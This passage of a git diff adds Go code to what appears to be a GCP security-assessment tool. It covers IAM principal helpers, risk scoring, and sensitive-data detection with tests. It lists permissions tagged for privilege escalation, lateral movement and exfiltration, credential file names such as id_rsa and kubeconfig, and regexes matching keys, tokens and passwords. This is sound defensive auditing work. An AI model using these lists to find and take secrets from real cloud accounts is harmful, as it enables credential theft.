GetPrincipalTypeLower(principal string) string { + if strings.HasPrefix(principal, "user:") { + return PrincipalTypeLowerUser + } else if strings.HasPrefix(principal, "serviceAccount:") { + return PrincipalTypeLowerServiceAccount + } else if strings.HasPrefix(principal, "group:") { + return PrincipalTypeLowerGroup + } + return PrincipalTypeLowerUnknown +} + +// ExtractPrincipalEmail extracts the email/identifier from an IAM member string. +// Returns the part after the ":" prefix, or the original string if no prefix found. +// +// Examples: +// - "user:admin@example.com" -> "admin@example.com" +// - "serviceAccount:sa@project.iam.gserviceaccount.com" -> "sa@project.iam.gserviceaccount.com" +// - "allUsers" -> "allUsers" +func ExtractPrincipalEmail(member string) string { + if idx := strings.Index(member, ":"); idx != -1 { + return member[idx+1:] + } + return member +} + +// IsPublicPrincipal checks if a principal represents public access. +// Returns true for "allUsers" or "allAuthenticatedUsers". +func IsPublicPrincipal(member string) bool { + return member == "allUsers" || member == "allAuthenticatedUsers" +} + +// IsServiceAccount checks if a principal is a service account. +func IsServiceAccount(member string) bool { + return strings.HasPrefix(member, "serviceAccount:") +} + +// IsUser checks if a principal is a user. +func IsUser(member string) bool { + return strings.HasPrefix(member, "user:") +} + +// IsGroup checks if a principal is a group. +func IsGroup(member string) bool { + return strings.HasPrefix(member, "group:") +} + +// IsDeleted checks if a principal has been deleted. +func IsDeleted(member string) bool { + return strings.HasPrefix(member, "deleted:") +} + +// ExtractServiceAccountProject extracts the project ID from a service account email. +// Service account format: name@project-id.iam.gserviceaccount.com +// Returns empty string if not a valid service account format. +func ExtractServiceAccountProject(saEmail string) string { + // Handle prefixed format + email := ExtractPrincipalEmail(saEmail) + + // Check for .iam.gserviceaccount.com suffix + suffix := ".iam.gserviceaccount.com" + if !strings.HasSuffix(email, suffix) { + return "" + } + + // Extract project from name@project-id.iam.gserviceaccount.com + atIdx := strings.Index(email, "@") + if atIdx == -1 { + return "" + } + + projectPart := email[atIdx+1 : len(email)-len(suffix)] + return projectPart +} + +// IsDefaultServiceAccount checks if a service account is a default compute or app engine SA. +// Default SAs follow patterns like: +// - PROJECT_NUMBER-compute@developer.gserviceaccount.com +// - PROJECT_ID@appspot.gserviceaccount.com +func IsDefaultServiceAccount(saEmail string) bool { + email := ExtractPrincipalEmail(saEmail) + return strings.HasSuffix(email, "@developer.gserviceaccount.com") || + strings.HasSuffix(email, "@appspot.gserviceaccount.com") +} + +// IsGoogleManagedServiceAccount checks if a service account is managed by Google. +// These typically have formats like: +// - service-PROJECT_NUMBER@*.iam.gserviceaccount.com +// - PROJECT_NUMBER@cloudservices.gserviceaccount.com +func IsGoogleManagedServiceAccount(saEmail string) bool { + email := ExtractPrincipalEmail(saEmail) + return strings.HasPrefix(email, "service-") || + strings.Contains(email, "@cloudservices.gserviceaccount.com") || + strings.Contains(email, "@cloud-ml.google.com.iam.gserviceaccount.com") || + strings.Contains(email, "@gcp-sa-") +} diff --git a/gcp/shared/risk.go b/gcp/shared/risk.go new file mode 100644 index 00000000..1d6b8663 --- /dev/null +++ b/gcp/shared/risk.go @@ -0,0 +1,317 @@ +package shared + +import ( + "fmt" + "strings" +) + +// RiskLevel constants for standardized risk assessment across modules +const ( + RiskCritical = "CRITICAL" // Immediate exploitation possible, highest priority + RiskHigh = "HIGH" // Significant security issue, high priority + RiskMedium = "MEDIUM" // Notable risk, moderate priority + RiskLow = "LOW" // Minor issue or informational + RiskInfo = "INFO" // Informational, no direct risk + RiskNone = "NONE" // No risk identified +) + +// RiskScore represents a risk assessment with reasons +type RiskScore struct { + Level string // RiskCritical, RiskHigh, RiskMedium, RiskLow + Score int // Numeric score for comparison (0-100) + Reasons []string // Explanations for the risk level +} + +// NewRiskScore creates a new RiskScore with default low risk +func NewRiskScore() *RiskScore { + return &RiskScore{ + Level: RiskLow, + Score: 0, + Reasons: []string{}, + } +} + +// AddReason adds a reason and recalculates the risk level +func (r *RiskScore) AddReason(reason string, points int) { + r.Reasons = append(r.Reasons, reason) + r.Score += points + r.updateLevel() +} + +// SetCritical sets the risk to critical level with a reason +func (r *RiskScore) SetCritical(reason string) { + r.Level = RiskCritical + r.Score = 100 + r.Reasons = append(r.Reasons, reason) +} + +// updateLevel updates the risk level based on score +func (r *RiskScore) updateLevel() { + switch { + case r.Score >= 80: + r.Level = RiskCritical + case r.Score >= 50: + r.Level = RiskHigh + case r.Score >= 25: + r.Level = RiskMedium + default: + r.Level = RiskLow + } +} + +// ReasonsString returns all reasons as a single string +func (r *RiskScore) ReasonsString() string { + if len(r.Reasons) == 0 { + return "-" + } + return strings.Join(r.Reasons, "; ") +} + +// IsHighRisk returns true if risk level is HIGH or CRITICAL +func (r *RiskScore) IsHighRisk() bool { + return r.Level == RiskCritical || r.Level == RiskHigh +} + +// RiskLevelOrder returns the numeric order of a risk level (for sorting) +// Higher number = higher risk +func RiskLevelOrder(level string) int { + switch level { + case RiskCritical: + return 4 + case RiskHigh: + return 3 + case RiskMedium: + return 2 + case RiskLow: + return 1 + case RiskInfo, RiskNone: + return 0 + default: + return -1 + } +} + +// CompareRiskLevels compares two risk levels. +// Returns: -1 if a < b, 0 if a == b, 1 if a > b +func CompareRiskLevels(a, b string) int { + orderA := RiskLevelOrder(a) + orderB := RiskLevelOrder(b) + if orderA < orderB { + return -1 + } + if orderA > orderB { + return 1 + } + return 0 +} + +// MaxRiskLevel returns the higher of two risk levels +func MaxRiskLevel(a, b string) string { + if CompareRiskLevels(a, b) >= 0 { + return a + } + return b +} + +// RiskLevelFromScore converts a numeric score to a risk level +func RiskLevelFromScore(score int) string { + switch { + case score >= 80: + return RiskCritical + case score >= 50: + return RiskHigh + case score >= 25: + return RiskMedium + case score > 0: + return RiskLow + default: + return RiskNone + } +} + +// RiskCounts tracks counts of findings by risk level +type RiskCounts struct { + Critical int + High int + Medium int + Low int + Info int + Total int +} + +// Add increments the appropriate counter based on risk level +func (rc *RiskCounts) Add(level string) { + rc.Total++ + switch level { + case RiskCritical: + rc.Critical++ + case RiskHigh: + rc.High++ + case RiskMedium: + rc.Medium++ + case RiskLow: + rc.Low++ + case RiskInfo, RiskNone: + rc.Info++ + } +} + +// Summary returns a formatted summary string +func (rc *RiskCounts) Summary() string { + parts := []string{} + if rc.Critical > 0 { + parts = append(parts, fmt.Sprintf("%d CRITICAL", rc.Critical)) + } + if rc.High > 0 { + parts = append(parts, fmt.Sprintf("%d HIGH", rc.High)) + } + if rc.Medium > 0 { + parts = append(parts, fmt.Sprintf("%d MEDIUM", rc.Medium)) + } + if rc.Low > 0 { + parts = append(parts, fmt.Sprintf("%d LOW", rc.Low)) + } + if len(parts) == 0 { + return "No risks found" + } + return strings.Join(parts, ", ") +} + +// HasHighRisk returns true if there are any CRITICAL or HIGH findings +func (rc *RiskCounts) HasHighRisk() bool { + return rc.Critical > 0 || rc.High > 0 +} + +// Common risk assessment functions for GCP resources + +// AssessPublicAccessRisk returns risk level for public access configuration +func AssessPublicAccessRisk(isPublic bool, hasAllUsers bool, hasAllAuthenticatedUsers bool) string { + if hasAllUsers { + return RiskCritical // Publicly accessible to everyone + } + if hasAllAuthenticatedUsers { + return RiskHigh // Accessible to any Google account + } + if isPublic { + return RiskMedium // Some form of public access + } + return RiskNone +} + +// AssessEncryptionRisk returns risk level for encryption configuration +func AssessEncryptionRisk(encryptionEnabled bool, usesCMEK bool) string { + if !encryptionEnabled { + return RiskHigh // No encryption + } + if !usesCMEK { + return RiskLow // Google-managed keys (default) + } + return RiskNone // Customer-managed keys +} + +// AssessLoggingRisk returns risk level for logging configuration +func AssessLoggingRisk(loggingEnabled bool) string { + if !loggingEnabled { + return RiskMedium // No audit trail + } + return RiskNone +} + +// DangerousPermissionCategories defines categories of dangerous permissions +var DangerousPermissionCategories = map[string]string{ + // Privilege Escalation + "iam.serviceAccountKeys.create": "privesc", + "iam.serviceAccounts.actAs": "privesc", + "iam.serviceAccounts.getAccessToken": "privesc", + "iam.serviceAccounts.implicitDelegation": "privesc", + "iam.serviceAccounts.signBlob": "privesc", + "iam.serviceAccounts.signJwt": "privesc", + "deploymentmanager.deployments.create": "privesc", + "cloudfunctions.functions.create": "privesc", + "cloudfunctions.functions.update": "privesc", + "run.services.create": "privesc", + "composer.environments.create": "privesc", + "dataproc.clusters.create": "privesc", + "cloudbuild.builds.create": "privesc", + "resourcemanager.projects.setIamPolicy": "privesc", + "resourcemanager.folders.setIamPolicy": "privesc", + "resourcemanager.organizations.setIamPolicy": "privesc", + + // Lateral Movement + "compute.instances.setMetadata": "lateral", + "compute.projects.setCommonInstanceMetadata": "lateral", + "compute.instances.setServiceAccount": "lateral", + "container.clusters.getCredentials": "lateral", + + // Data Exfiltration + "storage.objects.get": "exfil", + "storage.objects.list": "exfil", + "bigquery.tables.getData": "exfil", + "bigquery.jobs.create": "exfil", + "secretmanager.versions.access": "exfil", + "cloudkms.cryptoKeyVersions.useToDecrypt": "exfil", +} + +// IsDangerousPermission checks if a permission is considered dangerous +func IsDangerousPermission(permission string) bool { + _, exists := DangerousPermissionCategories[permission] + return exists +} + +// GetPermissionCategory returns the risk category for a permission +func GetPermissionCategory(permission string) string { + if cat, exists := DangerousPermissionCategories[permission]; exists { + return cat + } + return "" +} + +// AssessPermissionRisk returns the risk level for a specific permission +func AssessPermissionRisk(permission string) string { + category := GetPermissionCategory(permission) + switch category { + case "privesc": + return RiskCritical + case "lateral": + return RiskHigh + case "exfil": + return RiskHigh + default: + return RiskLow + } +} + +// HighPrivilegeRoles lists roles that grant significant permissions +var HighPrivilegeRoles = map[string]string{ + "roles/owner": RiskCritical, + "roles/editor": RiskCritical, + "roles/iam.securityAdmin": RiskCritical, + "roles/iam.serviceAccountAdmin": RiskCritical, + "roles/iam.serviceAccountKeyAdmin": RiskCritical, + "roles/iam.serviceAccountTokenCreator": RiskCritical, + "roles/iam.serviceAccountUser": RiskHigh, + "roles/iam.workloadIdentityUser": RiskHigh, + "roles/storage.admin": RiskHigh, + "roles/bigquery.admin": RiskHigh, + "roles/secretmanager.admin": RiskHigh, + "roles/cloudkms.admin": RiskHigh, + "roles/compute.admin": RiskHigh, + "roles/container.admin": RiskHigh, + "roles/cloudfunctions.admin": RiskHigh, + "roles/run.admin": RiskHigh, + "roles/cloudsql.admin": RiskHigh, + "roles/dataproc.admin": RiskHigh, + "roles/composer.admin": RiskHigh, +} + +// AssessRoleRisk returns the risk level for a given role +func AssessRoleRisk(role string) string { + if level, exists := HighPrivilegeRoles[role]; exists { + return level + } + // Check for admin patterns + if strings.HasSuffix(role, ".admin") || strings.Contains(role, "Admin") { + return RiskMedium + } + return RiskLow +} diff --git a/gcp/shared/sensitive.go b/gcp/shared/sensitive.go new file mode 100644 index 00000000..800f31d3 --- /dev/null +++ b/gcp/shared/sensitive.go @@ -0,0 +1,368 @@ +package shared + +import ( + "regexp" + "strings" +) + +// SensitivePattern defines a pattern for matching file/object names or resource names. +type SensitivePattern struct { + Pattern string + Category string + RiskLevel string + Description string +} + +// ContentPattern defines a regex-based pattern for matching inside text content. +type ContentPattern struct { + Regex *regexp.Regexp + Category string + RiskLevel string + Description string +} + +// SensitiveMatch represents a file/resource name match result. +type SensitiveMatch struct { + Pattern string + Category string + RiskLevel string + Description string + MatchedText string +} + +// ContentMatch represents a content regex match result. +type ContentMatch struct { + Pattern string + Category string + RiskLevel string + Description string + MatchedText string + Snippet string // surrounding context +} + +// GetFilePatterns returns patterns for detecting sensitive files in bucket/object names. +// These are the same patterns previously defined in bucketEnumService. +func GetFilePatterns() []SensitivePattern { + return []SensitivePattern{ + // Credentials - CRITICAL + {Pattern: ".json", Category: "Credential", RiskLevel: "CRITICAL", Description: "Service account key file"}, + {Pattern: "credentials.json", Category: "Credential", RiskLevel: "CRITICAL", Description: "GCP credentials file"}, + {Pattern: "service-account", Category: "Credential", RiskLevel: "CRITICAL", Description: "Service account key"}, + {Pattern: "keyfile", Category: "Credential", RiskLevel: "CRITICAL", Description: "Key file"}, + {Pattern: ".pem", Category: "Credential", RiskLevel: "CRITICAL", Description: "PEM private key"}, + {Pattern: ".key", Category: "Credential", RiskLevel: "CRITICAL", Description: "Private key file"}, + {Pattern: ".p12", Category: "Credential", RiskLevel: "CRITICAL", Description: "PKCS12 key file"}, + {Pattern: ".pfx", Category: "Credential", RiskLevel: "CRITICAL", Description: "PFX certificate file"}, + {Pattern: "id_rsa", Category: "Credential", RiskLevel: "CRITICAL", Description: "SSH private key"}, + {Pattern: "id_ed25519", Category: "Credential", RiskLevel: "CRITICAL", Description: "SSH private key (ed25519)"}, + {Pattern: "id_ecdsa", Category: "Credential", RiskLevel: "CRITICAL", Description: "SSH private key (ECDSA)"}, + + // Secrets - CRITICAL/HIGH + {Pattern: ".env", Category: "Secret", RiskLevel: "CRITICAL", Description: "Environment variables (may contain secrets)"}, + {Pattern: "secrets", Category: "Secret", RiskLevel: "HIGH", Description: "Secrets file or directory"}, + {Pattern: "password", Category: "Secret", RiskLevel: "HIGH", Description: "Password file"}, + {Pattern: "api_key", Category: "Secret", RiskLevel: "HIGH", Description: "API key file"}, + {Pattern: "apikey", Category: "Secret", RiskLevel: "HIGH", Description: "API key file"}, + {Pattern: "token", Category: "Secret", RiskLevel: "HIGH", Description: "Token file"}, + {Pattern: "auth", Category: "Secret", RiskLevel: "HIGH", Description: "Authentication file"}, + {Pattern: ".htpasswd", Category: "Secret", RiskLevel: "HIGH", Description: "HTTP password file"}, + {Pattern: ".netrc", Category: "Secret", RiskLevel: "HIGH", Description: "FTP/other credentials"}, + + // Config files - HIGH/MEDIUM + {Pattern: "config", Category: "Config", RiskLevel: "MEDIUM", Description: "Configuration file"}, + {Pattern: ".yaml", Category: "Config", RiskLevel: "MEDIUM", Description: "YAML config (may contain secrets)"}, + {Pattern: ".yml", Category: "Config", RiskLevel: "MEDIUM", Description: "YAML config (may contain secrets)"}, + {Pattern: "application.properties", Category: "Config", RiskLevel: "HIGH", Description: "Java app config"}, + {Pattern: "web.config", Category: "Config", RiskLevel: "HIGH", Description: ".NET config"}, + {Pattern: "appsettings.json", Category: "Config", RiskLevel: "HIGH", Description: ".NET app settings"}, + {Pattern: "settings.py", Category: "Config", RiskLevel: "HIGH", Description: "Django settings"}, + {Pattern: "database.yml", Category: "Config", RiskLevel: "HIGH", Description: "Rails database config"}, + {Pattern: "wp-config.php", Category: "Config", RiskLevel: "HIGH", Description: "WordPress config"}, + {Pattern: ".npmrc", Category: "Config", RiskLevel: "HIGH", Description: "NPM config (may contain tokens)"}, + {Pattern: ".dockercfg", Category: "Config", RiskLevel: "HIGH", Description: "Docker registry credentials"}, + {Pattern: "docker-compose", Category: "Config", RiskLevel: "MEDIUM", Description: "Docker compose config"}, + {Pattern: "terraform.tfstate", Category: "Config", RiskLevel: "CRITICAL", Description: "Terraform state (contains secrets)"}, + {Pattern: ".tfstate", Category: "Config", RiskLevel: "CRITICAL", Description: "Terraform state file"}, + {Pattern: "terraform.tfvars", Category: "Config", RiskLevel: "HIGH", Description: "Terraform variables"}, + {Pattern: "kubeconfig", Category: "Config", RiskLevel: "CRITICAL", Description: "Kubernetes config"}, + {Pattern: ".kube/config", Category: "Config", RiskLevel: "CRITICAL", Description: "Kubernetes config"}, + + // Backups - HIGH + {Pattern: ".sql", Category: "Backup", RiskLevel: "HIGH", Description: "SQL database dump"}, + {Pattern: ".dump", Category: "Backup", RiskLevel: "HIGH", Description: "Database dump"}, + {Pattern: ".bak", Category: "Backup", RiskLevel: "MEDIUM", Description: "Backup file"}, + {Pattern: "backup", Category: "Backup", RiskLevel: "MEDIUM", Description: "Backup file/directory"}, + {Pattern: ".tar.gz", Category: "Backup", RiskLevel: "MEDIUM", Description: "Compressed archive"}, + {Pattern: ".zip", Category: "Backup", RiskLevel: "MEDIUM", Description: "ZIP archive"}, + + // Source code - MEDIUM + {Pattern: ".git", Category: "Source", RiskLevel: "MEDIUM", Description: "Git repository data"}, + {Pattern: "source", Category: "Source", RiskLevel: "LOW", Description: "Source code"}, + + // Logs - LOW (but may contain sensitive data) + {Pattern: ".log", Category: "Log", RiskLevel: "LOW", Description: "Log file (may contain sensitive data)"}, + {Pattern: "access.log", Category: "Log", RiskLevel: "MEDIUM", Description: "Access log"}, + {Pattern: "error.log", Category: "Log", RiskLevel: "MEDIUM", Description: "Error log"}, + + // Cloud-specific + {Pattern: "cloudfunctions", Category: "Cloud", RiskLevel: "MEDIUM", Description: "Cloud Functions source"}, + {Pattern: "gcf-sources", Category: "Cloud", RiskLevel: "MEDIUM", Description: "Cloud Functions source bucket"}, + {Pattern: "cloud-build", Category: "Cloud", RiskLevel: "MEDIUM", Description: "Cloud Build artifacts"}, + {Pattern: "artifacts", Category: "Cloud", RiskLevel: "LOW", Description: "Build artifacts"}, + } +} + +// contentPatterns is the compiled list, initialized once. +var contentPatterns []ContentPattern + +func init() { + contentPatterns = compileContentPatterns() +} + +func compileContentPatterns() []ContentPattern { + defs := []struct { + pattern string + category string + riskLevel string + description string + }{ + // Credentials - CRITICAL + {`"type"\s*:\s*"service_account"`, "Credential", "CRITICAL", "GCP service account key JSON"}, + {`-----BEGIN\s*(RSA|EC|DSA|OPENSSH)?\s*PRIVATE KEY-----`, "Credential", "CRITICAL", "Private key"}, + {`AKIA[0-9A-Z]{16}`, "Credential", "CRITICAL", "AWS access key"}, + {`AIza[0-9A-Za-z_\-]{35}`, "Credential", "CRITICAL", "GCP API key"}, + + // Secrets - HIGH + {`(?i)(password|passwd|pwd)\s*[:=]\s*\S+`, "Secret", "HIGH", "Password assignment"}, + {`(?i)bearer\s+[a-zA-Z0-9_\-\.]+`, "Secret", "HIGH", "Bearer token"}, + {`(?i)(jdbc|mongodb|mysql|postgres|redis)://[^\s]+`, "Secret", "HIGH", "Connection string"}, + + // Tokens - HIGH + {`eyJ[a-zA-Z0-9_-]*\.eyJ[a-zA-Z0-9_-]*\.[a-zA-Z0-9_-]*`, "Token", "HIGH", "JWT token"}, + {`ya29\.[0-9A-Za-z_-]+`, "Token", "HIGH", "GCP OAuth token"}, + {`gh[ps]_[A-Za-z0-9_]{36,}`, "Token", "HIGH", "GitHub token"}, + + // PII - MEDIUM + {`\b(?:4[0-9]{12}(?:[0-9]{3})?|5[1-5][0-9]{14}|3[47][0-9]{13})\b`, "PII", "MEDIUM", "Credit card number"}, + {`\b\d{3}-\d{2}-\d{4}\b`, "PII", "MEDIUM", "SSN pattern"}, + } + + patterns := make([]ContentPattern, 0, len(defs)) + for _, d := range defs { + compiled := regexp.MustCompile(d.pattern) + patterns = append(patterns, ContentPattern{ + Regex: compiled, + Category: d.category, + RiskLevel: d.riskLevel, + Description: d.description, + }) + } + return patterns +} + +// GetContentPatterns returns regex-based patterns for matching inside text content +// (log entries, query results, etc.). +func GetContentPatterns() []ContentPattern { + return contentPatterns +} + +// GetNamePatterns returns patterns for detecting sensitive resource names +// (table names, column names, dataset names). +func GetNamePatterns() []SensitivePattern { + return []SensitivePattern{ + // Credentials/keys + {Pattern: "password", Category: "Credential", RiskLevel: "HIGH", Description: "Password-related resource"}, + {Pattern: "passwd", Category: "Credential", RiskLevel: "HIGH", Description: "Password-related resource"}, + {Pattern: "secret", Category: "Credential", RiskLevel: "HIGH", Description: "Secret-related resource"}, + {Pattern: "credential", Category: "Credential", RiskLevel: "HIGH", Description: "Credential-related resource"}, + {Pattern: "token", Category: "Credential", RiskLevel: "HIGH", Description: "Token-related resource"}, + {Pattern: "auth", Category: "Credential", RiskLevel: "MEDIUM", Description: "Authentication-related resource"}, + {Pattern: "private_key", Category: "Credential", RiskLevel: "CRITICAL", Description: "Private key resource"}, + {Pattern: "api_key", Category: "Credential", RiskLevel: "HIGH", Description: "API key resource"}, + {Pattern: "access_key", Category: "Credential", RiskLevel: "HIGH", Description: "Access key resource"}, + {Pattern: "encryption_key", Category: "Credential", RiskLevel: "HIGH", Description: "Encryption key resource"}, + + // PII + {Pattern: "ssn", Category: "PII", RiskLevel: "HIGH", Description: "SSN-related resource"}, + {Pattern: "social_security", Category: "PII", RiskLevel: "HIGH", Description: "Social security resource"}, + {Pattern: "credit_card", Category: "PII", RiskLevel: "HIGH", Description: "Credit card resource"}, + {Pattern: "cc_number", Category: "PII", RiskLevel: "HIGH", Description: "Credit card number resource"}, + {Pattern: "cvv", Category: "PII", RiskLevel: "HIGH", Description: "CVV resource"}, + + // Compliance + {Pattern: "pii", Category: "Compliance", RiskLevel: "HIGH", Description: "PII-labeled resource"}, + {Pattern: "phi", Category: "Compliance", RiskLevel: "HIGH", Description: "PHI-labeled resource"}, + {Pattern: "hipaa", Category: "Compliance", RiskLevel: "HIGH", Description: "HIPAA-labeled resource"}, + {Pattern: "gdpr", Category: "Compliance", RiskLevel: "HIGH", Description: "GDPR-labeled resource"}, + {Pattern: "sensitive", Category: "Compliance", RiskLevel: "MEDIUM", Description: "Sensitive-labeled resource"}, + + // Financial + {Pattern: "payment", Category: "Financial", RiskLevel: "HIGH", Description: "Payment-related resource"}, + {Pattern: "billing", Category: "Financial", RiskLevel: "MEDIUM", Description: "Billing-related resource"}, + {Pattern: "financial", Category: "Financial", RiskLevel: "HIGH", Description: "Financial resource"}, + {Pattern: "salary", Category: "Financial", RiskLevel: "HIGH", Description: "Salary-related resource"}, + {Pattern: "bank", Category: "Financial", RiskLevel: "HIGH", Description: "Banking-related resource"}, + + // General sensitive data + {Pattern: "user_data", Category: "Data", RiskLevel: "MEDIUM", Description: "User data resource"}, + {Pattern: "customer_data", Category: "Data", RiskLevel: "MEDIUM", Description: "Customer data resource"}, + {Pattern: "personal", Category: "Data", RiskLevel: "MEDIUM", Description: "Personal data resource"}, + {Pattern: "confidential", Category: "Data", RiskLevel: "HIGH", Description: "Confidential resource"}, + } +} + +// MatchFileName checks an object/file name against file patterns. +// Returns the first match, or nil if no match. +func MatchFileName(objectName string, patterns []SensitivePattern) *SensitiveMatch { + name := strings.ToLower(objectName) + ext := strings.ToLower(fileExt(objectName)) + baseName := strings.ToLower(fileBase(objectName)) + + for _, pattern := range patterns { + matched := false + patternLower := strings.ToLower(pattern.Pattern) + + // Check extension match + if strings.HasPrefix(patternLower, ".") && ext == patternLower { + matched = true + } + // Check name contains pattern + if strings.Contains(name, patternLower) { + matched = true + } + // Check base name match + if strings.Contains(baseName, patternLower) { + matched = true + } + + if matched { + if IsFilePathFalsePositive(objectName, pattern) { + continue + } + return &SensitiveMatch{ + Pattern: pattern.Pattern, + Category: pattern.Category, + RiskLevel: pattern.RiskLevel, + Description: pattern.Description, + MatchedText: objectName, + } + } + } + return nil +} + +// MatchContent checks text content against content patterns. +// Returns all matches found. +func MatchContent(text string, patterns []ContentPattern) []ContentMatch { + var matches []ContentMatch + for _, pattern := range patterns { + locs := pattern.Regex.FindAllStringIndex(text, -1) + for _, loc := range locs { + matchedText := text[loc[0]:loc[1]] + snippet := extractSnippet(text, loc[0], loc[1], 50) + matches = append(matches, ContentMatch{ + Pattern: pattern.Regex.String(), + Category: pattern.Category, + RiskLevel: pattern.RiskLevel, + Description: pattern.Description, + MatchedText: matchedText, + Snippet: snippet, + }) + } + } + return matches +} + +// MatchResourceName checks a resource name (table, column, dataset) against name patterns. +// Uses case-insensitive substring matching. Returns the first match, or nil. +func MatchResourceName(name string, patterns []SensitivePattern) *SensitiveMatch { + nameLower := strings.ToLower(name) + for _, pattern := range patterns { + patternLower := strings.ToLower(pattern.Pattern) + if strings.Contains(nameLower, patternLower) { + return &SensitiveMatch{ + Pattern: pattern.Pattern, + Category: pattern.Category, + RiskLevel: pattern.RiskLevel, + Description: pattern.Description, + MatchedText: name, + } + } + } + return nil +} + +// IsFilePathFalsePositive checks if a file path match is a common false positive. +func IsFilePathFalsePositive(path string, pattern SensitivePattern) bool { + nameLower := strings.ToLower(path) + + // Filter out common false positive paths + falsePositivePaths := []string{ + "node_modules/", + "vendor/", + ".git/objects/", + "__pycache__/", + "dist/", + "build/", + } + + for _, fp := range falsePositivePaths { + if strings.Contains(nameLower, fp) { + return true + } + } + + // JSON files that are likely not credentials + if pattern.Pattern == ".json" { + if !strings.Contains(nameLower, "service") && + !strings.Contains(nameLower, "account") && + !strings.Contains(nameLower, "credential") && + !strings.Contains(nameLower, "key") && + !strings.Contains(nameLower, "secret") && + !strings.Contains(nameLower, "auth") { + return true + } + } + + return false +} + +// extractSnippet returns surrounding context around a match. +func extractSnippet(text string, start, end, contextLen int) string { + snippetStart := start - contextLen + if snippetStart < 0 { + snippetStart = 0 + } + snippetEnd := end + contextLen + if snippetEnd > len(text) { + snippetEnd = len(text) + } + snippet := text[snippetStart:snippetEnd] + // Replace newlines with spaces for cleaner output + snippet = strings.ReplaceAll(snippet, "\n", " ") + snippet = strings.ReplaceAll(snippet, "\r", "") + return snippet +} + +// fileExt returns the file extension (e.g., ".json"). +func fileExt(name string) string { + for i := len(name) - 1; i >= 0; i-- { + if name[i] == '.' { + return name[i:] + } + if name[i] == '/' { + return "" + } + } + return "" +} + +// fileBase returns the last component of a path. +func fileBase(name string) string { + for i := len(name) - 1; i >= 0; i-- { + if name[i] == '/' { + return name[i+1:] + } + } + return name +} diff --git a/gcp/shared/sensitive_test.go b/gcp/shared/sensitive_test.go new file mode 100644 index 00000000..4388fdf4 --- /dev/null +++ b/gcp/shared/sensitive_test.go @@ -0,0 +1,191 @@ +package shared + +import ( + "testing" +) + +func TestMatchFileName_Credential(t *testing.T) { + patterns := GetFilePatterns() + + tests := []struct { + name string + input string + wantNil bool + category string + }{ + {"service account key", "my-project-sa-key.json", false, "Credential"}, + {"pem file", "certs/server.pem", false, "Credential"}, + {"ssh key", "home/.ssh/id_rsa", false, "Credential"}, + {"p12 file", "keys/cert.p12", false, "Credential"}, + {"random txt", "readme.txt", true, ""}, + {"random png", "image.png", true, ""}, + } + + for _, tt := range tests { + t.Run(tt.name, func(t *testing.T) { + result := MatchFileName(tt.input, patterns) + if tt.wantNil && result != nil { + t.Errorf("expected nil match for %q, got %+v", tt.input, result) + } + if !tt.wantNil && result == nil { + t.Errorf("expected match for %q, got nil", tt.input) + } + if !tt.wantNil && result != nil && result.Category != tt.category { + t.Errorf("expected category %q for %q, got %q", tt.category, tt.input, result.Category) + } + }) + } +} + +func TestMatchFileName_FalsePositives(t *testing.T) { + patterns := GetFilePatterns() + + // These should be filtered as false positives + fps := []string{ + "node_modules/package.json", + "vendor/lib/config.yaml", + ".git/objects/abc123", + "__pycache__/module.key", + "dist/bundle.env", + } + + for _, fp := range fps { + result := MatchFileName(fp, patterns) + if result != nil { + t.Errorf("expected false positive for %q, got %+v", fp, result) + } + } +} + +func TestMatchFileName_JSONFiltering(t *testing.T) { + patterns := GetFilePatterns() + + // Plain .json should be filtered unless it contains credential keywords + result := MatchFileName("data/report.json", patterns) + if result != nil { + t.Errorf("expected nil for non-credential json, got %+v", result) + } + + // Credential-related .json should match + result = MatchFileName("data/service-account-key.json", patterns) + if result == nil { + t.Errorf("expected match for service account json, got nil") + } +} + +func TestMatchContent(t *testing.T) { + patterns := GetContentPatterns() + + tests := []struct { + name string + input string + wantCount int + category string + }{ + { + "GCP SA key", + `{"type": "service_account", "project_id": "test"}`, + 1, "Credential", + }, + { + "private key", + `-----BEGIN RSA PRIVATE KEY-----\nMIIEpAIBAAK...`, + 1, "Credential", + }, + { + "AWS key", + `access_key = AKIAIOSFODNN7EXAMPLE`, + 1, "Credential", + }, + { + "JWT", + `token=eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiIxMjM0NTY3ODkwIn0.abc_def-ghi`, + 1, "Token", + }, + { + "password assignment", + `db_password=SuperSecret123`, + 1, "Secret", + }, + { + "connection string", + `url=postgres://user:pass@host:5432/db`, + 1, "Secret", + }, + { + "no match", + `This is a normal log entry with no sensitive data.`, + 0, "", + }, + } + + for _, tt := range tests { + t.Run(tt.name, func(t *testing.T) { + matches := MatchContent(tt.input, patterns) + if len(matches) != tt.wantCount { + t.Errorf("expected %d matches for %q, got %d: %+v", tt.wantCount, tt.name, len(matches), matches) + } + if tt.wantCount > 0 && len(matches) > 0 && matches[0].Category != tt.category { + t.Errorf("expected category %q, got %q", tt.category, matches[0].Category) + } + }) + } +} + +func TestMatchResourceName(t *testing.T) { + patterns := GetNamePatterns() + + tests := []struct { + name string + input string + wantNil bool + category string + }{ + {"password column", "user_password", false, "Credential"}, + {"secret table", "app_secrets", false, "Credential"}, + {"ssn column", "customer_ssn", false, "PII"}, + {"credit card", "credit_card_numbers", false, "PII"}, + {"pii dataset", "raw_pii_data", false, "Compliance"}, + {"payment table", "payment_transactions", false, "Financial"}, + {"normal table", "products", true, ""}, + {"normal column", "created_at", true, ""}, + } + + for _, tt := range tests { + t.Run(tt.name, func(t *testing.T) { + result := MatchResourceName(tt.input, patterns) + if tt.wantNil && result != nil { + t.Errorf("expected nil for %q, got %+v", tt.input, result) + } + if !tt.wantNil && result == nil { + t.Errorf("expected match for %q, got nil", tt.input) + } + if !tt.wantNil && result != nil && result.Category != tt.category { + t.Errorf("expected category %q for %q, got %q", tt.category, tt.input, result.Category) + } + }) + } +} + +func TestIsFilePathFalsePositive(t *testing.T) { + p := SensitivePattern{Pattern: ".key", Category: "Credential", RiskLevel: "CRITICAL"} + + if !IsFilePathFalsePositive("node_modules/crypto/test.key", p) { + t.Error("expected node_modules to be false positive") + } + if IsFilePathFalsePositive("secrets/server.key", p) { + t.Error("expected secrets/server.key to not be false positive") + } +} + +func TestExtractSnippet(t *testing.T) { + text := "prefix some password=Secret123 suffix text" + snippet := extractSnippet(text, 12, 29, 10) + if len(snippet) == 0 { + t.Error("expected non-empty snippet") + } + // Snippet should contain the match and some context + if len(snippet) > len(text) { + t.Error("snippet should not exceed original text length") + } +} diff --git a/globals/gcp.go b/globals/gcp.go index 1ec42f68..1b6bb53b 100644 --- a/globals/gcp.go +++ b/globals/gcp.go @@ -1,15 +1,90 